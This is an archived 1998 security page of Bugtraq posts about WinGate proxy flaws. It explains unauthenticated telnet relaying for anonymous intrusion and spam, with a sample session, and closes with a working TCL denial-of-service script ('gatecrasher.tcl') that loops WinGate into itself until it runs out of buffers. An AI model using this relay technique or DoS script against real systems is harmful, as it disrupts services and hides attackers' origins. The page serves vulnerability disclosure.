Wingate telnet redirection
Summary |
---|
Description: | A somewhat common technique for attackers is to install "telnet redirectors" on a system they have compromised. This allows them to telnet to the redirector and then telnet out from there anonymously, masking their true point of origin. These attackers no longer need to bother with penetrating systems, as the Wingate includes anonymous telnet redirection as a feature enabled by default! Just telnet to port 1080 or 23 and then telnet right back out to wreak havok on the internet. And don't worry, it doesn't (by default) log anything! <sigh> |
Author: | Alans other account <alanb@MANAWATU.GEN.NZ> |
Compromise: | Intruders can mask their true point of origin by going through Wingate |
Vulnerable Systems: | Windows boxes running Wingate |
Date: | 11 February 1998 |
Notes: | Many thanks to Dairo Bel <dairo@akrata.org> for translating his spanish article on Wingate and sending it in! Also note that you can use nmap, a network portscanner I wrote to locate hosts on your network that are running Wingate. |
Details |
---|
Date: Wed, 06 May 1998 22:37:04 +0300 From: Dairo BelTo: fyodor@nmap.org Subject: WinGate> Use and Abuse Hi fyodor: [cut] -----------------------------cut here-------------------------------- Well, here iīm going to explain to all of you, the amazing use that one Wingate could have. But... start in the begining. 1.- Overview: Imagine that we have 3 computers in our home, but we have only one modem. Of course, we would like be able to access to the Internet with the 3 computers, but there are an obvious problem; although these computers was connected in a Net, only the one wich have the modem can access to the internet. The way to be able to access with all of them, is a Proxy software. One Proxy (if somebody donīt know it), is something like a footbridge, in manner than you can jump to another place; in this case, the internet. What it does, is negotiate the different request to go out wich we do in our 3 computers net. Althoug only the first computer was connected to the internet, the second and third could been connected through it. 2.- Software: One WinGate is a Windows95 or WindowsNT software, wich negotiate the request of our little net. The way to implementate it, is (like all in windows) very simple, even it have options by default. The other computers has internal IPs, wich when it goes out of the little net, the wingate change those IPs, by its own IP, so, it seems that all the request have been made by the same computer, when in fact, it isnīt true. The port opened by default is 1080 3.- Description: The footbridges wich was used by our 3 computers, should be closed to everybody who didnīt belong to our little net. Thats why anyone could connect to our Wingate, and leave with our IP address. The main bug, is that the wingate donīt try to authenticate the user who is connecting with it. The way this can occur is simply making telnet to the Wingate IP, and will appear to us: WinGate> Then, we can use it like a footbridge, because it thinks that the attacker is one of the internal net computer. Is enough to put the IP to wich i want to connect, and from there, it leave to Internet with the wingate IP. For example, if our net is im.agoodboy.com, one attacker, for example im.abadguy.com could do this: im.abadguy.com$ telnet im.agoodboy.com trying.. im.agoodboy.com connected WinGate>193.158.24.5 trying... 193.158.24.5 connected System RH 4.2 login: Etc. Well, what the attacker has been done, is connect from im.abadguy.com to the Wingate (our net), and through it, to the 193.158.24.5 IP. The IP that 193.158.24.5 will receive, will be the Wingate IP (our IP!) nor the attacker IP. That isnīt the only thing that he could do. If he wants, he could make this trough any another port, like ftp, mail, etc. From here, we can deduce that we could be able to send *totally* anonymous mail, like if it was one remailer, or one of those old sendmails. Another weakness in the Wingates, is that if we know the IPs in the Internal Net, we can have totall acces without any problem. If the computers in the internal net are running under Windows, and i have installed samba (to have access to the wingate), we can connect directly to them. If the internal computers are running under some UNIX, we can do a telnet to them. Please, think what could occur if the internal computers have one ++ in their .rhosts file to have a simple acces between them. The owner of the little net, was thinking that he is safe from the external attacks, because he is protected by a proxy... when it isnīt certainly. If we put one Wingate like a server in our IRC client, we can send commands to another IRC server, by virtue of /quote or /raw (depending of the client). Itīs possible to jump to another site in that manner too. Another possible attack may occur if our little net has shared resources. In that case, the attacker could configure the Wingate like his default gateway. After that, he could be able to "see" all the computers in our network, because the wingate thinks that he is one of them. In this manner, the Wingate turn into something like a router for the attacker. If he wanted, for example, he could put one sniffer in their own machine. All the information which leaves from our network, should pass first through the Wingate, and through the attacker after that... One more possibility is to connect with a Wingate in 808 port. If itīs bad configured, may be two things. The machine could crash, or we could enter directly to their internal net. This vulnerability nor always works, but sometimes yes. I canīt determine why. Finally, only say that the Wingate donīt keep *any* type of logs. If you connect to a Wingate, nobody will be able to know which was the IP connected to it. In Wingate versions 1.3 and 1.3*, the Wingate software DON'T keep logs, and didnīt exists any option to keep it. Itīs 100% anonymous. Version 2.0 there are one option, and if you activate it, the logs was keeped. By default, that option isnīt activated. About 80% of the companys wich used Wingate, has the 1.3 version of this software, so if any use it in a malicious mode, you will be anonymous. 4.- Conclusions If we donīt take care in quit all of the gateways wich give acces from the network, and keep only the proxy, the Wingate software lets one attacker connect through it, and camouflage him in a perfectly anonymous mode. In the same face, under certainly conditions, is possible to have access to the computers in the internal network. This bug exists until 2.0 version at last. 5.- Greetings: To my loved girlfriend M.A., and to the man who gives to me the idea to use one wingate as a gateway. dairo@akrata.org If you wants, you can use this pgp key to mail me: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 4.5 mQENAjUkvQEAAAEIALVsQBpEksdzCJksy1t8lqU1oYNcCsuUc9TsXcCd/rDNDECD v8rX+DIdblhVoWx/7V24tB2H5ekJKAY7Ntgw8TEngmDY8xAlpniCwYN/Q3sD82IN cSXyRykld9x37EWcvMIffh3d/bRxmFYuVweLd+6wm36utwVuJ9IE6kibrQmDese4 ne2G0dQl7K/xnOSxIE71sSxuB4+qcmWtnjPNwXi1OOiX9FWMlL+C5HONFhVxe1jL gFDT7okryAb4CJFQi4D/5uhz8HPT1HGwRa8ox24LttArK+xFnsQ2SAjg8af401Yo sHNZktjjdBz1HkWRouonKUrTYyBSDVkEFJENRPkABRG0HERhaXJvIEJlbCA8ZGFp cm9AYWtyYXRhLm9yZz4= =a2Bz -----END PGP PUBLIC KEY BLOCK----- -----------------------------cut here-------------------------------- Best Regards, Dairo Bel oOo !Hispahack Research Team oOo Date: Wed, 11 Feb 1998 15:14:02 +1300 From: Alans other account <alanb@MANAWATU.GEN.NZ> To: BUGTRAQ@NETSPACE.ORG Subject: WIngate: the sequel I've had a fair amount of mail following my posting about this to the list. What follows is a very brief summary. 1: Confirmation that a large number of sites have already experienced spammers smtp relaying via insecure wingates. Numbers relayed have ranged from "a couple of thousand" to "over 20,000" messages. 2: Ditto on nntp. This seems to be a favourite method for porn spammers in particular. 3: Ditto on IRC. I have a mirc IRC abuse script onhand which quite happily searches for wingates and attaches one floodbot per gateway. Tests have shown that upwards of 100 wingates can quite easily be used by a single attacker. 4: Open wingates are also wide open for any savvy attacker to attach to machines behind the wingate "firewall". 5: Although the primary attack method is to use socks port 1080, the same techniques are easily used on port 23, so firewalling socks is a temporary solution at best. All of these are worrying, given the number of people who attack sites perceived as participating in spam. There's a fairly good set of web pages on securing wingate at http://www.deerfield.com/wingate/secure-wingate.htm - this appears to be the Wingate home site. The Undernet IRC network has had to temporarily lock out users from 2 large cable networks in Canada and the USA due to attacks against network admins. Those attacks were at one point coming from upwards of 200 different IPs and seemed to be driven by one individual. Given Wingate's lack of logging facilities, there is almost no hope of tracing attackers who initiate denial of service actions like this, so ISPs may well face having this kind of action taken against them by IRC (or other) networks in order to maintain usability of their systems. The end result is chaos on helpdesks. Wingate's authors apparently are continuing to ignore the abuse issues associated with default settings. How long before they get the message? AB
From carother@OU.EDU Wed May 13 00:48:32 1998
Date: Sat, 21 Feb 1998 04:38:56 -0600
From: Matt Carothers <carother@OU.EDU>
To: BUGTRAQ@NETSPACE.ORG
Subject: WinGate DoS
After a WinGate attack on our IRC channel, a friend of mine was toying around and discovered a fun bug:
$ telnet unsecured.wingate.com
Trying XXX.XX.XX.XXX...
Connected to XXX.XX.XX.XXX.
Escape character is '^]'.
WinGate>localhost
Connecting to host localhost...Connected
As you can see, the WinGate happily connects to itself. Do this enough times, and ...
WinGate>localhost
Connecting to host localhost...Out of buffers
At this point, the WinGate stops forwarding connections. Clients can still connect but cannot make use of it.
Below is a simple TCL exploit to demonstrate the idea.
- Matt
#!/usr/local/bin/tclsh
# gatecrasher.tcl
#
# This opens a WinGate and connects it to itself repeatedly until the
# target machine runs out of buffers and stops forwarding connections.
# The WinGate will not function as long as the script is running.
#
# Credit goes to Chris Snell <texan@hooked.net> for finding the bug.
#
# I apologize in advance for not being cool enough to script this is perl.
#
# - Matt Carothers <carother@ou.edu>
set host [lindex $argv 0];
set port [lindex $argv 1];
if {![string compare $host ""]} {
set command [string range $argv0 [expr [string last / $argv0] + 1] end];
puts stdout "Usage: $command <host> \[port\]";
exit 1;
}
if {![string compare $port ""]} {
set port 23;
}
if {[catch {set sock [socket $host $port]} stuff]} {
# Could not connect for some reason. Output an error message and exit.
puts stdout "$host:$port : $stuff";
exit 1;
}
puts stdout "Connected to $host:$port. Launching WinGate kill ...";
set flag 0;
puts $sock "localhost";
flush $sock;
while {[gets $sock line] >= 0} {
if {[string match "*Connected*" $line]} {
# We've successfully connected the WinGate to itself.
# Whee, let's do it again.
puts $sock "localhost";
flush $sock;
puts -nonewline stdout ".";
flush stdout;
set flag 0;
} elseif {[string match "*Out of buffers*" $line]} {
# The WinGate is now out of buffers.
# We'll output a message to that effect and keep trying. This
# serves as a keep-alive and lets us jump in and fill any buffers
# freed by clients which disconnect after the attack succeeds.
if {!$flag} {
puts stdout "\n*plink*"; set flag 1;
}
puts $sock "localhost";
flush $sock;
}
}
puts stdout "\nConnection lost.";
More Exploits! |
---|
The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's | Linux | Solaris/SunOS | Micro$oft |
*BSD | Macintosh | AIX | IRIX |
ULTRIX/Digital UNIX | HP/UX | SCO | Remote exploits |
This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: